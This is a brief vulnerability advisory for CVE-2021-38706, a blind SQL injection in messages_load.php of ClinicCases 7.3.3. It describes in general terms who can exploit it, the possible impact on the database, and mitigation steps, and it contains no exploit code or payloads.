CVE-2021-38706

Vulnerability

A blind SQL injection vulnerability exists in messages_load.php within ClinicCases version 7.3.3. The flaw allows an attacker with low privileges to execute arbitrary SQL commands via a vulnerable parameter. The specific parameter is not detailed in the references, but the attack surface is reachable through the messaging functionality of the application [1].

Exploitation

To exploit this vulnerability, an attacker must have a low-privileged account on the ClinicCases instance. The attacker sends crafted input to the vulnerable parameter in messages_load.php, triggering a blind SQL injection. The attack does not require special network access beyond being an authenticated user of the application [1].

Impact

Successful exploitation allows the attacker to execute arbitrary SQL commands against the database. This could lead to disclosure of sensitive data, modification or deletion of database content, or potentially further compromise of the application and its data. The privilege level gained is the same as the database user configured for the application, which may have elevated permissions [1].

Mitigation

The repository for ClinicCases was archived by the owner on August 24, 2024, and is now read-only. No official patched version has been released for CVE-2021-38706. Users should immediately restrict access to the application, review database permissions, and consider migrating to an alternative solution if possible. This vulnerability is not listed on the CISA Known Exploited Vulnerabilities (KEV) catalog [1].